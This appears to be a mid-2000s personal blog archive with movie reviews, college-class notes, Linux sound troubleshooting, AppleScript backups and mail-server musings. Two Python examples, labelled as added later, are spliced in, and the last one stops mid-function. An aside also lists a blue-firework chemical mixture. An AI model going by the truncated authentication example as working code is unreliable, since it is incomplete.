A = amount you will have
P = principal
r = interest rate
t = time in years
e = well, just e
So I end up with 40000e^(.02*5) which is $44206, or an increase of about $70 a month. Fun stuff.
Read a very interesting paper about using ultrasound for bacterial disinfection. From the paper:
Ultrasound is able to inactivate bacteria and deagglomerate bacterial clusters or flocs through a number of physical, mechanical and chemical effects arising from acoustic cavitation. On collapse, cavitation bubbles produce enough energy to mechanically weaken or disrupt bacteria or biological cells via a number of processes.
Makes me think what application this can have for humans. I wonder if such 'sound' could have effects on cell division and cancer.
Imagine a decontamination chamber in the future that a person goes in and is cleansed of bacteria from his body by sound waves.
My Infiniti FX35 was due for a 30k mile service. It cost $700!! You would think that an expensive car would have cheap maintenance, but that's not the case. I can't wait until my lease is over to get rid of this gas hog.
They gave me a loaner G35. I like that car a lot. It has the same engine as my truck. Getting a loaner is fun because I can treat the car like shit. I had some fun flooring the gas and slamming the brakes.
Had a chance to check out Hustle & Flow tonight and I thought it was a great movie. I have a soft spot for stories about people trying to get a record deal, and this movie captured the essence of making hiphop music. I used to have a little gig going producing such music. Ah, those were the days. I didn't really like the music in this movie as it's mostly what used to be called 'west side'. I don't know what it's called these days as I don't listen to much rap.
The main actor Terrence Dashon Howard was very good. I remember him as the pimp in Dead Presidents, and man that was one evil pimp. I honestly thought he was going to be a great actor after seeing that. Here he plays a 'good' pimp. All of the characters were very convincing, and the movie is just raw and gritty.
The ending was completely unexpected. Both sad and hopeful at the same time. Definitely check it out.
Melatonin is an over-the-counter drug that supposedly helps with jetlag. It's a substance that your body naturally produces. It supposedly lets you control your sleep better. My brother had some so I tried one.
First I learned you probably should not take it before sleeping. Unfortunately I did, and it took about 10 hours for me to feel anything. It made me kinda dull throughout the day, and created an oversensitivity to light. It did provide a relaxing effect and I could fall asleep during the day, whereas I normally have a lot of trouble doing that. So for me at least, it seems a good pill for jetlag.
What is kinda strange is melatonin has a different effect than the chemical in cold medicines that make you sleepy. With melatonin, it's light-reacting. When there is light, you do not feel drowsy. It's only when it is dark that you get sleepy.
Update: Actually there are other factors affecting how quickly it works. I took this on an empty stomach and exercised right after, and I felt effects within 2 hours. Most dosage instructions recommend taking it right before sleeping, but if on a full stomach it will take some time to get into your bloodstream.
Tonight I checked out Rob Zombie's The Devil's Rejects. This movie pretty much takes pieces of From Dusk Till Dawn, Natural Born Killers, and The Texas Chainsaw Massacre and tries to make a new movie out of that. It had some interesting scenes, but it was nowhere near as stylish or intelligent as those other movies.
Sure there is some shocking dialogue and scenes, but I found it hard to place the characters in their roles. They came across as actors trying to be shocking. In Natural Born Killers and From Dusk Till Dawn there were believable characters and great acting. You actually empathized with the sick individuals. Here you don't really care what happens, other than wanting the cute female sadist to live.
The direction is pretty bad, and just comes across as mimicry of better directors. It's a fun movie though, and if you want to see some blood and gore you will get it. There is a lot of Freebird-type music playing as people die, which to me seems played out. There is one hilarious scene about sex with chickens that is probably worth the price of admission. Don't worry, it's only dialogue.
I've gotten 97, 86, and 85 on my algebra exams. Everyone is venting in this class, and looking at the scores, you can see not many people are doing well. I am student 629956. I feel like a prison inmate. The teacher doesn't even give back the exams so you have no idea what you missed.
I was talking to one student who was getting good grades and attempted a quadratic formula derivation on the exam. He got no credit, just like me. But he said he put down everything correct, and checked this with his TA. Teacher's Assistants run the math 'lab' class. When he brought this up with the main teacher he said that he included more information than necessary and therefore got no points. When the student tried to debate this, the teacher's response was "I'm a mathematician."
Give me a break... it's fucking algebra.
There's a very interesting interview in the latest Discover magazine about sleep. Luckily they put it online.
There are some interesting points made in the interview. One being that you are more likely to remember something you've learned if you sleep right afterwards. But what's ironic is you are also more likely to remember something if you learn it just after waking. Throughout the day your synapses get 'heavier' and it is harder to retain information. Hmm, so when should I learn something new again?
The article describes an experiment that basically shows that when you learn something, there is more brain activity during sleep. Babies sleep so much more because of all they are learning. Some of those eureka moments come after sleep, and the idea is that during sleep, your brain increases the signal to noise ratio on the concepts you've learned. You are able to concentrate completely on the 'problem' without any distractions.
I pretty much hate self-help crap. But a friend sent this to me and it was interesting. Read on for your daily dose of self-help therapy.
Yes, I've gone over to the dark side. You may notice that I now have Google ads on the right side of my blog.
The majority of ads that seem to be popping up are related to blogging. Those advertisers must be searching for blogging keywords in the HTML, probably even b2evolution specific stuff, because I don't paste the word 'blog' all over my site any more than other words.
However if you look on Prashant's blog, the ads are at least a bit more relevant. You can buy spiritual books and what not.
I thought it was pretty cool it let me customize the color of the ads to match my blog skin. It gave me a chance to use OS X's Digital Colormeter application to get the right hex color values.
Our Biology teacher described fainting in an interesting way. Basically it has to do with your brain needing more oxygen/blood. Your body wants to put your head in the same plane as your heart horizontally, so there is less resistance to pump blood there. What's the best way? Get you on the floor, immediately. Hence, the faint.
I don't know how factual this is, and I don't see it described this way anywhere else. I just find it amazing that no matter how much control you think you have of yourself, if the body thinks something is wrong, it will do whatever it can to fix the problem no matter what you may 'think'. It will just shut your consciousness off, as if it says "screw you, I'm taking over now."
Ok well, not exactly. But interesting story nonetheless.
I'm watching this great documentary by Carl Sagan called "Who Speaks for Earth?". I transcribed this quote which, in respect to recent events, is something people should think about.
Which aspects of our nature will prevail is uncertain, particularly when our visions and prospects are bound to one small part of this small planet Earth. But up there in the cosmos an inescapable perspective awaits. National boundaries are not evident when we view the Earth from space. Fanatic ethnic or religious or national identifications are a little difficult to support when we see our planet as a fragile blue crescent, fading to become an inconspicuous point of light against the bastion and citadel of the stars. There are not yet obvious signs of extra-terrestrial intelligence and this makes us wonder whether civilizations like ours rush inevitably headlong into self-destruction. I dream about it. And sometimes they're bad dreams.
Tonight I was thinking about the many different multivitamins out there and wondered if there was some site that objectively rated them. Searching on Google for 'best multivitamin' returns a lot of results that are either devoid of brand names or are links to sites that sell their own multivitamins with their own biased reviews. It's sort of like searching for 'best cialis' when you really want the best cialis. You end up with crappy search results.
It seems any objective reviewer is afraid to list any brand names. It gives the impression that the drug makers have a lot of influence on such sites, similar to magazines and advertising. Maybe they think they will be sued if they said Centrum sucks.
I did come across this PDF which seems to be a pretty good review of the major brands.
I'm taking a class called Biological Principles which is basically college Biology II. The teacher is very good and makes the class interesting even in the boring areas. His lecture is composed of Powerpoint presentations with lots of nice graphics and animations. He gives it out on CD, and the .ppt files are like 40-50 megs. Ouch.
He goes into funny anecdotes during his lecture which keeps it upbeat. Like today he mentioned some friends of his who let their dog 'french kiss' their baby. A student was arguing a dog's mouth is cleaner than a human's, but he pretty much said dogs lick their ass, and I don't want them french kissing me hehe. Then he said something like "then again, some humans lick their ass also" and the class laughed a lot. Hehe, what? It's cool though, more teachers should be like that.
Anyway, I got an 89% (B+) on my first exam. That kinda sucks, because I really need to get an A in this class. I need to study harder. The students who get an A on an exam are put up as his first slide during a presentation and he points them out in class. Someone else told me this is not 'legal' to do, but I think it's actually encouraging. He makes a point that the majority of students who get A's sit in the front of the class, and tells everyone to do so. Another student I was talking to said he is going to get an A and sit at the back of the class just to prove him wrong, hehe.
We've been learning about cells in biology (cytology), and I vaguely remember some of this stuff from high school. I find it very interesting now though, and back then didn't really care much about this stuff.
One of the many structures a cell has is lysosomes. These are used within the cell as a sort of digestive system. They also eat and destroy broken parts of the cell itself, in a recycling process called autophagy. The first thing that popped in my mind when I read this is whether this could be a way for cancer cells to eat and destroy themselves. Wouldn't it be cool if cancer cells could be 'programmed' to self destruct.
Then I found out about apoptosis which is literally programmed cell death. Some more searching found that there has been research done on using lysosomes to fight cancer. That's something I'm very interested in.
Interesting article on brushing the tongue.
One thing I learned in Chemistry (yes I learned something) is that blue light in fireworks is the hardest to produce. Oxidized magnesium produces white light. Yellow light is easiest to make using sodium like Na3AlF6. Strontium produces red light, and barium green such as barium nitrate.
But blue light is the hardest to produce. Supposedly it can be made by decomposing copper(I) chloride at low temperature by mixing CuCl with KClO4, copper powder, and hexachloroethane C2Cl6. It's only available in recently made, and probably expensive, fireworks.
Last night while watching fireworks I looked around for any blue lights and as expected I did not see any. The closest I saw was violet.
I checked out Romero's Land of the Dead tonight, which is being billed as Romero's Ultimate Zombie Masterpiece. Indeed it is. I love all of the social commentary zombie movies. At first I wasn't sure what to think of this movie, as it progressed kinda slow. But eventually everything built up and it was more than I expected.
This film is mainly about humans and how they treat each other. At the end of the movie you are actually rooting for the zombies. In previous zombie movies, they had no intelligence. In this case, they have evolved. There is sort of an alpha zombie, who has been learning tricks by watching humans and imitating them. There are a few scenes similar to 2001 where the monkey finds out how to use a tool. In this case, it is a machine gun, a sledgehammer, a gas pump, and a machete. That's evolution for you. There is a classic scene of the zombies busting into a beautiful apartment building where all of the upper class people are living, and I couldn't help wanting all those rich folk to be eaten. The movie gives a true impending dread as the zombies slowly figure out how to get past each of the city's obstacles.
There are 3 other scenes that stick out for me as sheer genius in this film. They may sound really stupid, but you have to see it to appreciate it. One is where a military dude is about to throw a grenade and a zombie cuts off his hand with a machete before he's able to release it. His hand falls down, and he falls on top of the grenade, blowing himself up. HAHA. The other is a zombie chewing off one of those sexy belly button rings. I laughed out loud at both of these scenes. The other scene is where the people are trapped between the electric fence they created to keep out the zombies which they can't turn off, and the zombies themselves. Let's just say a feeding frenzy ensues.
There are also other little nuances, like Dennis Hopper picking his nose and saying "Zombies really creep me out." If you liked Night of the Living Dead, Dawn of the Dead, 28 Days Later, or any other good zombie flick, you have to check this one out.
A while ago I had set up an Ubuntu Linux system for my mom to use. There were some issues with sound not working that I never really looked into. This morning I decided to look more into it.
Basically, the problem was that sound was not working. Looking at an 'lsmod' showed a snd-cmipci module loaded which I found out was the driver for my card (Crystal Media 8738). So I started checking log messages for any device not found messages but didn't find any. Sound applications, like Real Player, would just hang when they started. Doing an strace on them revealed them trying to open /dev/audio, /dev/dsp, or /dev/snd/pcmSomeHexCrap and just locking on that. Then I tried something simple:
echo a > /dev/audio
This should return immediately with some garbage sound sent to the device. But it didn't, and just hung. I thought it might be an IRQ or some sort of hardware conflict. I found on Google mention of upgrading to a new ALSA driver (ALSA is what Ubuntu uses). So I downloaded the ALSA source, which then wanted a configured Linux kernel source. Ubuntu does not include this, and I didn't want to be fucking recompiling the kernel for sound.
So I said forget upgrading, I'll see if it's another problem. Just by chance, I SSH'ed remotely into the box and didn't log in on the console. I tried the same echo command above and it worked. Then I tried aplay to play a sound and it worked. At this point sound was working when I didn't log in to X. So some sound daemon X is starting is screwing things up. That narrowed it down.
I logged in on X and started looking at the lsof output of daemons that sound like they have something to do with sound. I found esd had /dev/dsp open, and a 'killall esd' later I was able to play sounds just fine. I ended up disabling the 'sound server' via System-Preferences-Sound as explained here, which said goodbye to esd. Real Player was happy now.
A Google search comes up with mention of using '-as 2' to esd which might help. I honestly don't give a shit. This just reinforces to me the pathetic state of sound on Linux.
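The lsof step from this post, as an added Python example that is not part of the original post: it walks /proc the way lsof does and reports which processes hold a device node such as /dev/dsp open. The function names and the proc_root parameter are assumptions made for this sketch.

```python
import os


def _command(proc_root, pid):
    """Read the short command name for a PID, or '?' if it is unreadable."""
    try:
        with open(os.path.join(proc_root, pid, "comm")) as fh:
            return fh.read().strip()
    except OSError:
        return "?"


def find_holders(device, proc_root="/proc"):
    """Return sorted (pid, command) pairs for processes that have `device` open.

    Each /proc/<pid>/fd/<n> entry is a symlink to the file the descriptor
    refers to, so a process blocking a sound device shows up as a link
    whose target is the device path.
    """
    holders = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue  # skip non-process entries such as 'self' or 'meminfo'
        fd_dir = os.path.join(proc_root, entry, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:
            continue  # process exited, or it belongs to another user
        for fd in fds:
            try:
                target = os.readlink(os.path.join(fd_dir, fd))
            except OSError:
                continue  # descriptor was closed while we were looking
            if target == device:
                holders.append((int(entry), _command(proc_root, entry)))
                break  # one open descriptor is enough to list the process
    return sorted(holders)


if __name__ == "__main__":
    # The device nodes named in the post; run as root to see other users' processes.
    for dev in ("/dev/dsp", "/dev/audio"):
        for pid, cmd in find_holders(dev):
            print(f"{dev}: pid {pid} ({cmd})")
```

Without root, descriptors of other users' processes are unreadable and are silently skipped, so an empty result does not prove the device is free.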
In my Biology class we are talking about evolution. Originally, Lamarck described how characteristics are given to offspring. He said that characteristics acquired in an animal's life are passed on. This is simply incorrect, and the best example is that of a giraffe. Lamarck would say that a giraffe stretches his neck, and therefore its children will have long necks. That is like saying a human dyes her hair, and her offspring has the same color hair.
Darwin of course says that the process is natural selection. Those that are at a disadvantage to reproduce will die off. The idea is through generations and generations, mutations cause changes in a species, and some of those changes turn out to be advantageous. Those animals would reproduce more, and be more 'fit'.
Our teacher asked us to think of the Lamarck vs Darwin explanation for certain animals. One is the mole, which is blind. What would be the reason why the mole is blind? Lamarck would say that the eyes became less useful, and so became vestiges. That's wrong. The Darwinian explanation is that having eyes became disadvantageous. This could have been due to the eyes causing more problems than they solve since the animal is always underground. Dirt could get in the eyes, infections, etc. There was more likelihood that the blind moles survived and reproduced more than the seeing ones.
Another thing our teacher asked us to think about: tooth size in humans has been decreasing. I can see the Lamarck explanation, that large teeth are less useful than small teeth with the current diet. But this is not a Darwinian explanation. For that, there must be something that causes the big teeth humans to die off. Having small teeth must correlate somehow with being able to reproduce more.
The only explanation I can come up with is maybe large toothed humans had trouble finding mates and reproduced much less than the more attractive small toothed ones. That sounds ridiculous, but what other reason could it be?
There is also another concept called 'gene expression'. I don't know much about this, but I believe it is something like dormant characteristics or abilities that normally aren't available but are 'expressed' by some means. Maybe it's being able to have an immunity to a certain type of disease. Basically evolution without the need for natural selection/offspring. That seems kinda crazy, and reminds me of the Lamarck view. I need to find out more about it.
Update: This paper lists some possible explanations for teeth size decreasing in humans. From the paper:
Last weekend I ended my apartment lease and moved to my brother's house in Boca Raton. This is a lot closer to FAU. I lose some privacy and a very nice apartment, but it's not too bad. Most of my time these days is spent in the library anyhow, and I pretty much have zero social life.
My first summer semester is over and I got an A in Chemistry I and a B+ in the lab. I should've got an A in the lab but they have some ridiculous online quiz system that the student is responsible to take before certain deadlines. I didn't meet the deadlines for a few of them simply because I forgot. I just think it's idiotic to make the students responsible for going to take a quiz. It should just be given in class.
Anyway, hopefully I can keep up the steam. There have been issues with how I'm going to fund this whole schooling thing but I think it will work out. I'll probably need to take a loan here and there.
I never much was a Batman fan, so I didn't plan on checking out Batman Begins. I had seen the trailer and liked Christian Bale from American Psycho, but that's about it. Then I read Ebert's review which got me interested. I found out from there that it was directed by Christopher Nolan and then I just had to see it. This is the director that did Memento, which I thought was an amazing achievement in filmmaking.
What a great movie. I never thought there was a lot of philosophy and politics behind Batman, and judging from the Adam West TV show who would think that? At the beginning of the movie I saw monasteries and other Buddhism-like stuff and was thinking WTF? But this movie is very dark and thought-provoking indeed. It seems like that's the trend nowadays. Compare the 'darkness' factor of the early Star Wars to the latest one. Things are just a lot meaner. It goes into 'why' there is a Batman, and I found it really interesting and inspiring. Batman is essentially a person that dedicates his life to an ideal. It's something I try to do in my little life as well. There is an interesting bit about him becoming a criminal and going to jail just to understand the criminal mind. That's how much dedication he had.
The movie talks a lot about confronting one's fears. There is a very cool scene where pre-Batman is being 'initiated' by a league of crime-fighters. He is given a drug that magnifies all of his fears, and while on this drug, he must defend himself. It's a strange and dark scene, and I kept thinking this can't be for kids to watch. It's rated PG-13 though. Honestly I think it should be R.
I'm not sure if many people will like the movie. It has a lot of action, but it also is heavy on dialogue. The direction is good. It was refreshing to see a car chase in a blockbuster movie that isn't a fucking car commercial for once. My only gripe is that during the fight scenes it is hard to tell what is going on. The camera flies everywhere. I understand it adds to the excitement factor, but it's a little overboard.
When I signed up for College Algebra, I thought this class would be a joke. I've taken courses up to Calculus 3 and Differential Equations more than 8 years ago. I'm taking the premed requisites again as I have retained no knowledge from those days.
I like math, and get a kick out of working out pointless problems. I don't see any practical uses for it other than to provide exercise for my brain in problem solving. But I have to say, this College Algebra class is the hardest math class I've ever been in. I learned that many people in the class are taking it for the 2nd and even 3rd time. When I first heard that I thought they must be fucking idiots. But this teacher seems to like torturing students.
Now I got a 96% on the first exam, and just took the 2nd one today. It was much harder than the first, but I think I did fairly well except for the gay word problems ('uniform motion', 'mixing coffee', and dumb speedboats going up and downriver). But I'm sort of at an advantage because I vaguely remember some of the stuff and I'm studying my ass off. My main problem is during class and the homework, the problems are ridiculously simple compared to the questions on the exam. I'm not sure what the teacher is trying to prove here, but it would definitely help students to go through problems of the same difficulty level as the exam during class. It's like they want students to fail in order to pay more money to re-take the course.
For extra credit on the exam they asked to derive the quadratic formula. Believe me, everyone needs extra credit in this class. I knew how to do it, but what's silly is if you didn't explain your steps or worded anything unclear you would get no points, not even partial credit. That's just plain idiotic.
I got a 96% on my 2nd Chemistry exam as well. That was easy, and I should've got a 100% if it weren't for some dumb mistake. Class average was 60% though.
Well I'm getting pounded with ridiculous blog spam. SURBL and MX checking on the URL is not helping. I'm tempted to disable comments altogether. I think what I'll do is not allow URLs altogether in comments.
I read an interesting interview in Discover magazine with Doug Melton regarding stem cell research and ethics.
An interesting quote:
What would happen if scientists injected human stem cells into a monkey embryo? What would grow? A human heart, a human brain, a toe? That is a kind of new biology that I find a million times more interesting than these specious arguments over whether life begins at fertilization.
On the fear of stem cell research:
I would tell you that my own view is that there is an innate fear of crossing boundaries; people feel secure with boundaries. Why have ideas of chimeras fascinated man for millennia? Minotaurs and mermaids? Why is that so intriguing? If you think about it, the whole idea of classifying animals is that you could find a thing called a species, give a sort of stamp of approval on the idea that there is a natural order, there are boxes, there are shelves where everything has its so-called natural place. What is natural and what is anti-natural changes with time and is a very difficult subject.
People get the heebie-jeebies when you talk to them about putting a human brain into a dog. In fact, I would suggest there are two contexts where I think there might be an interesting connection. There is something like a natural double take when you see a person who's seriously deformed. People mostly say, when you see a burn victim or a person who's had an arm amputated, that the reason you're drawn to look at these poor people is the fear that it could happen to you. I actually think it's something deeper than that. I think it has to do with an affront to this idea of the natural order...
What was the significance of Mary Shelley's Frankenstein? Why was Frankenstein considered an important book? It was, in my view, because it addressed what is the essence of being human.
This sort of research is something that has always interested me. I would probably say that personally I am not bound by ethical or moral beliefs against creating a chimera if the research is helping us further science. I think the concept of a human being can, should, and will be blurred in due time. It's not that I'm not religious, it's that I don't believe that humans are at the top of any divine ladder.
We had our first exam in Chemistry and I got a 100%. Hell I never did this good when I went to school in the past heh. Honestly I seem to take school more seriously now than I did back then. Hopefully I can keep up the steam.
I had originally planned on putting class notes up on my wiki, but I realized that after I take notes I rarely ever look at them again heh. I've found the best way to remember or understand something is doing a lot of problems at the back of the chapters over and over again.
Well this will work for the problem-solving classes at least, but not much for memorization. For that I try to look for patterns and such. Like for the chem exam we have this cation/anion table that we are supposed to memorize, and the teacher says "there's no way to figure them out." But actually all you need to do is memorize a few key items from the table, not the whole thing, and you can calculate the rest (ion charge, number of each atom) from the periodic table which is given to you during a test. Also doing a lot of problems you learn to recognize them a lot faster, and are able to know which ones don't look right.
It's all about familiarity and practice. I know some people who have photographic memories. Not me, I have to do A LOT of practice to remember something.
So a Windows PC my mom was using got hosed and it seemed nontrivial to fix it. I said what the hell and installed Ubuntu Linux. I just showed her how to login and start a browser (that's all she normally does). I think something like this is the best way to determine usability of a distribution.
The issues that came up so far are java, flash, and real audio not working. Of course no distro I've ever used actually includes this stuff. Is it really just licensing issues? Luckily Ubuntu has a wiki page describing how to install these. It was relatively simple, but could've been simpler.
The other problem is sound simply doesn't work. I found that out when Real Player wouldn't start and the process would just hang. I did an strace and saw it was trying to write to /dev/dsp and hanging. I didn't have a chance to look into this much, so whatever, no sound for now.
I think it's kinda lame that for someone to use Linux they still need Linux expertise to install plugins, setup apt repositories, and other crap that only a long-time Linux user can grasp. And forget about setting up a printer. It's almost like all distros are kept elite for the job security of Linux sysadmins. I would really like to see a day when a computer illiterate can use Linux without relying on a friend that knows Linux.
In general the system seems to be working and I haven't got too many complaints. We'll see how long that lasts, and when the Windows withdrawal symptoms set in.
So in case anyone is wondering, I've been going to school for about a week. At first I was very overwhelmed with the studies, and the summer classes are especially condensed. I'm starting to get the hang of it though. It's taking a lot more of my time than work ever did!
I honestly enjoy the challenge. I know a lot of the stuff I'm doing now is rather useless knowledge, but as an exercise, trying to memorize, solve problems, etc, is fun to me. It's like working out, but with your brain.
Probably the best thing I like is being able to wear shorts and rags every day. Man I am so sick of wearing office clothes! Students are here for a reason, and not to just jerk off. Everyone has a long-term goal, which I think is pretty cool. It's different at work in an office. Most people there feel they are at the end and have reached their goal.
This is not to say that I do not have doubts on my decision. In fact, I many times don't know whether I'm making the right choice. I think giving it at least 1 semester will help me decide if I want to continue this. Also, if I can't get good grades now, that will tell me it's time to go back to work.
I am not a big fan of Jet Li's blockbuster movies, however I do like his lesser known films. I felt like seeing a movie and saw that something called Unleashed was playing. After seeing the trailer it looked very interesting, and then I found out it was written by Luc Besson who wrote Leon The Professional and La Femme Nikita. I knew it had to be good. His movies are usually about people ostracized from society but extremely talented in some brutal way.
It's basically about the Jet Li character being raised like a dog as a fighting machine. He soon becomes unleashed and gets to learn like a child what the world is about. It's a very dark movie at times, with Bob Hoskins playing an incredibly evil and convincing character. It's also a love story and has its sensitive sides. The fight scenes are exceptional, and it reminded me of Mad Max Beyond Thunderdome. There is a moving scene where after the Jet character experiences love and music, he is put in a pit to fight to death and tells his tormentor he no longer wishes to hurt people. Of course this only works for so long, with him only defending blows. But once the limits are pushed, the wild dog comes out again.
There is one very cool fight scene which I've never seen anything like before. It's a fight within a very claustrophobic bathroom. The walls are so close that just reaching back to throw a punch requires hitting a wall. The cinematography on this scene is pretty amazing.
The movie has a lot of piano music in it, Mozart, etc. The character learns that he loves music. It was a great movie, but there were some teenagers in the theatre who pretty much were heckling the film and its music at the end. Throughout the movie the music is by Massive Attack which are uptempo Matrix-like songs. It's still an extremely brutal film, so I'm wondering what sort of satisfaction these viewers were looking for.
I haven't been watching a lot of TV so had no idea what this movie was about initially. What drew me to it was a previous movie also called Crash by David Cronenberg. Let's look at the plot outline of that movie on IMDB:
Since a road accident left him with serious facial and bodily scarring, a former 'TV scientist' has become obsessed by the marriage of motor car technology with what he sees as the `raw sexuality' of car-crash victims. The scientist, along with a crash victim he has recently befriended, sets about performing a series of sexual acts in a variety of motor vehicles, either with other crash victims or with prostitutes who they contort into the shape of trapped-corpses. Ultimately, the scientist craves a suicidal union of blood, semen and engine coolant, a union with which he becomes dangerously obsessed.
I loved that movie. In general, I loved all Cronenberg movies. They are so visceral and deal with extremely odd aspects of human behavior.
However, this new Crash is far from the old version. It's a story about racial tensions in Los Angeles, and I have to admit it's one of the most intelligent movies I've seen tackling this subject. It reminded me of Magnolia, where many different threads in the story are followed and they ultimately all interweave with each other as if through divine intervention. It shows how good people are capable of evil, and how bad people are capable of good.
There is an interesting comment by the Don Cheadle character describing life in LA as being separated from other beings between glass and steel and no one touches you. We desire so much to feel another person that we crash into them.
So I've been pretty bored lately and came across libgmail, a Python library to access Gmail. It's very much a hack in that it emulates a web client.
But I was thinking, why don't I use this to write an IMAP interface to Gmail? So a few days ago I started working on such a hack. I'm sort of working backwards on this. Normally people would read the RFC. But instead, I configured mutt for IMAP, and started looking at some packet captures. I figure mutt's probably the cleanest IMAP client. I made my proxy behave how mutt expected from a normal IMAP client. Every now and then I'd refer to the RFC, but not much. In the backend, my proxy uses libgmail to get the needed info.
It's nowhere near completion, but I did get it to load up my inbox index in mutt. Here's a screenshot of my gmail account:

And here's a screenshot of mutt:

There are major problems in that when the message list is retrieved, all new messages are marked as seen. I don't see a way around this, since I need to get info on all messages to generate a proper index. I don't actually fetch the raw message to generate the message list, but instead 'fake' them by looking at the various info from the web interface (message date, from, to, subject, etc).
I'll probably post the code as soon as it's in some usable state. But at that point, Google may have already released IMAP support. It's a fun project nonetheless.
Update: A few people have asked about this, and unfortunately I've had no time to work on it. It's in a pretty much unusable state. It only works with mutt and you can only view messages in the Inbox (cannot send, change folders, etc). I've posted the code here, but be warned it's unusable.
So I'm reading an O'Reilly newsletter which gets sent to my gmail account. I came across this blog explaining some neat bash tricks. One of the comments pointed to a Unix Tip of the Day site which I thought would be cool to subscribe to.
Then I came across this blog about email newsletters. I thought to myself, I do get a shitload of newsletters to my email account, which I just read and trash. Do I want to add more crap? I think email is becoming more and more useless for such things. I end up wasting a lot of time reading email. Then I remembered that Bloglines lets you create random email addresses to use for subscribing to newsletters and such. It displays them just like the blog subscriptions.
This seems a more natural way of dealing with email newsletters, and I think I'll convert all of mine to this.
Interesting Exchange reverse-engineering project. Wonder if they will get DMCA'd.
I'm reading this book about medical specialties. I thought this description of an anesthesiologist was interesting:
From beginning to end, the practice of anesthesiology for each patient is similar to flying an airplane. As captain, the anesthesiologist first conducts a complete preoperative history and physical examination. Induction of anesthesia, using powerful drugs like propofol, represents the "take-off" into the flight of the procedure. This part is more than just pushing medications -- anesthesiologists have to set up the appropriate monitoring equipment and then intubate the patient. Once the patient is fully anesthetized, paralyzed, and breathing by a ventilator, maintenance has been achieved. Like a pilot, the anesthesiologist keeps careful watch over the patient, always adjusting physiologic parameters with pharmacologic agents as the case proceeds. Any operating room crises ("wind shear") require rapid interventions and quick thinking. The captain then lands the "anesthesia plane" by reversing neuromuscular paralysis, stopping anesthesia, and safely extubating the patient.
I have been through this "flight" two times in my life in the emergency room. It's strange, but both times even though I had only exchanged a few words with the anesthesiologist, this person stuck in my mind. They were both very caring and it almost made me feel nervous how much they cared. I realize now that their job requires this, as one wrong dosage and the patient will die.
I found it amazing how much control they had. I remember one telling me just before I was put out, "Ok, here comes the happy medicine." Then BAM! Immediately, before I could even laugh, I was out cold. What seemed like a few seconds later I was up in the recovery room. I was just fascinated at how powerful anesthesia could be. They are literally becoming a pilot of your body, and the above quote explains it well. It's an eerie situation. Think about it, you are so paralyzed that your body cannot even breathe, and you require a machine to do it for you. That's a lot of trust you are putting into the anesthesiologist. I remember reading about one doctor that went down into the wrong pipe when intubating. He didn't realize it until the patient was already dead.
Here is a very interesting story about how someone caught identity thieves.
I've been meaning to learn Applescript. It seems great for scripting all sorts of things. However, I've never got around to learning this. Here's my first lame Applescript application.
I have a website (duh) that I would like to backup to my Powerbook weekly. Now the easiest thing to do would be to create a backup shell script and install this in cron. That's great for a machine on 24x7, but my laptop is not. Hmm, ok so let's use anacron. That will make sure my backup script runs. But then I thought, what if I suspend my powerbook during a backup. I wouldn't be able to know when the backup was running.
Ok, so how about bringing up a dialog before the backup starts (and ideally during the backup, but I couldn't figure this out). So began a sojourn into Applescript. I found this article describing cronning iTunes, and it's somewhat related to what I need to do. How do I display a dialog? Granted I would probably know this if I actually learned Applescript, but I found display dialog.
I brought up Script Editor and started playing with it. I'm impressed with how intuitive it is to write these scripts. It has a cool record function also, which I didn't use. I ended up with the script:
tell me
    activate
end tell
display dialog "Backup process will run in a few seconds" giving up after 3
do shell script "~/Backups/website/backup.sh >/dev/null"
The 'tell me' stuff was needed to bring the script to the foreground when it runs from cron. I found this by digging in this document. I had to save this as a 'Application' in Script Editor so I could run it from the command line.
I already had anacron installed, but the next issue was that it was only running root's scripts (periodic). I ended up adding a script to /etc/periodic/weekly/ with contents:
#!/bin/sh
su - virajalankar -c /path/to/backup.app
This would run my Applescript as the proper user. It's sort of a clumsy solution though. I should probably put the backup logic in backup.app rather than a separate shell script. But like I said, I don't know a lot of Applescript.
The end result is this script gets run 'weekly', and brings up a dialog just before it runs. It won't do much good if I don't have an Internet connection when it runs though.
I do some consulting every now and then, and a recent project requires that I setup a Linux mail server for about 50 users.
Now this sounds like a very simple project, but I have been using CommuniGate Pro for so long that I've become unfamiliar with the current state of the art in free mail servers. I had some good experience with Postfix in the past, and I damn sure don't want to use Sendmail. I spent a few hours searching and found dozens of Postfix + SASL + Cyrus + IMAP + BLAH + MORE + WORK + THAN + NECESSARY guides. They are great and all, but honestly why does setting up an email server need to be so complicated?
Is there no free CommuniGate Pro equivalent out there? The closest thing I found was Courier, but it seems no one is using this as a complete server, and just using parts like IMAP. Maybe I'm wrong to look for an all-in-one solution. After some more research, the best combination of tools in my opinion for this project would be:
Everything else just seems messy to me. For my project it doesn't really make sense to have a 'virtual' domain setup, and instead I can just use local user accounts. The drawback is, since they are hashed passwords, client login is required to be plaintext. That shouldn't be a problem when using SSL, but still bothers me. One option is to store the passwords plaintext in a MySQL database, and configure the SASL stuff to authenticate via that.
A goal is to let this customer manage users via a web interface, but I've found no such tool. I was thinking if I just use system accounts, Webmin for account maintenance should be easy enough. Or maybe just some simple python scripts.
Anyhow, I setup a wiki page with some more info.
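An added example, not from the original post, of why hashed account passwords force plaintext client logins: a challenge-response mechanism needs the shared secret itself on the server. It assumes CRAM-MD5 (RFC 2195) as the challenge-response mechanism and uses PBKDF2 as a stand-in for the system's password hash; every name and sample value below is constructed.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # assumption for this sketch; tune for real deployments


def store_hashed(password, salt=None):
    """What a hashed account database keeps: a salt and a one-way digest."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_plain(record, password):
    """PLAIN/LOGIN: the client sends the password (inside TLS), the server
    re-hashes it and compares. Works with a hash-only store."""
    salt, digest = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)


def cram_md5_response(user, secret, challenge):
    """Client side of CRAM-MD5: HMAC-MD5 keyed with the shared secret over
    the server's challenge, sent as '<user> <hex digest>'."""
    mac = hmac.new(secret, challenge, hashlib.md5).hexdigest()
    return f"{user} {mac}"


def verify_cram(user, server_secret, challenge, response):
    """Server side of CRAM-MD5: it must recompute the same HMAC, so it needs
    the same key the client used, i.e. the password itself."""
    expected = cram_md5_response(user, server_secret, challenge)
    return hmac.compare_digest(expected, response)


def demo():
    user, password = "alice", "correct horse"          # constructed account
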